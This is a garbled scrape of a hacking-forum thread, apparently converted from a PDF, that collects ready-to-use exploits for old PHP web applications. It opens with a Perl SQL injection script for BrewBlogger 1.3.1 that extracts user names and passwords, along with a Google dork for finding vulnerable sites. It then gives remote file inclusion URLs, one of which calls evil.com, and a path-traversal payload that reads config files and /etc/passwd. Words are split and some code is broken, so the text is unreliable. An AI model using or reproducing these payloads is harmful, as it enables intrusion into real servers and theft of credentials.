# # BrewBlogger does not properly sanitize the 'id=' parameter passed to pri ntLog.php.. # Since each user entry contains an auto-incrementing ID number, it is possible to # enumerate al
Trang 1#
# BrewBlogger does not properly sanitize the 'id=' parameter passed to pri ntLog.php
# Since each user entry contains an
auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users'database by iterating
# through every possible ID number
#
#Vulnerable Code (truncated):
#
# $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($ _GET['id']);
# $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $c olname_log);
# $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
# This script will produce a URL which will reveal the user name and pas sword for
# the specified ID If no ID is specified, 2 is used (seems to be the usual I
D for
# the first user) The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:"
#
#Usage:
# ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
# intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
# Craig Heffner
Trang 2# heffnercj [at] gmail.com
# http://www.craigheffner.com
##############################################################
#############################
print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
# #
# Discovered and coded by: Craig Heffner #
###########################################
';
if(!$ARGV[0] || $ARGV[0] eq "-h"){
print "\nUsage: /brewlogger.pl <domain name + path> [user id]\n\nSee s cript comments for more details\n";
exit;
}
if(!$ARGV[1]){
$id = 2;
} else {
$id = $ARGV[1];
}
$url = "http://" $ARGV[0] "/printLog.php?id=0+UNION+SELECT+";
$a = 1;
while($a < 211){
if($a == 8){
$string = "user_name,";
} elsif($a == 9){
$string = "password,";
} elsif($a == 210){
$string = "1";
} else {
$string = "1,";
}
Trang 3$a++;
}
print "\n\nUse the following URL:\n\n" $url $string "+FROM+users+WH ERE+id=" $id "\n";
exit;
Black_hat_cr(HCE)
bug của IPB từ A-Z
Code:
http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=invision&Sear ch=Search
Black_hat_cr(HCE)
bug của phpbb từ A-Z
Code:
http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=phpbb&Searc h=Search
Black_hat_cr(HCE)
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
Code:
Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit:
http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.t xt?&
Trang 4Black_hat_cr(HCE)
CMS 4.0 Multiple Remote File Include Vulnerabilities
Code:
http://www.example.com/[path]/index.php?DIR_PLUGINS=[shell_script]
http://www.example.com/[path]/install.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script] http://www.example.com/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell _script]
http://www.example.com/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_scri pt]
http://www.example.com/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[sh ell_script]
http://www.example.com/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]
Black_hat_cr(HCE)
com_flyspray Mambo Com <= 1.0.1 Remote File Disclosure Vulnerability
Code:
******************************************************************
***********************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
******************************************************************
***********************************************************
Authour: Dr Max Virus
Location:Egypt
******************************************************************
***********************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
Trang 5***********************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file= / / / / /etc/passwd%00
******************************************************************
***********************************************************
Black_hat_cr(HCE)
com_loudmouth Mambo Component <= 4.0j Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility
download : http://mamboxchange.com/frs/download mouth-4.0j.zip
bug found in file abbc.class.php :
include(
$GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/a bbc/abbc.config.php');
http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all
#batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
Black_hat_cr(HCE)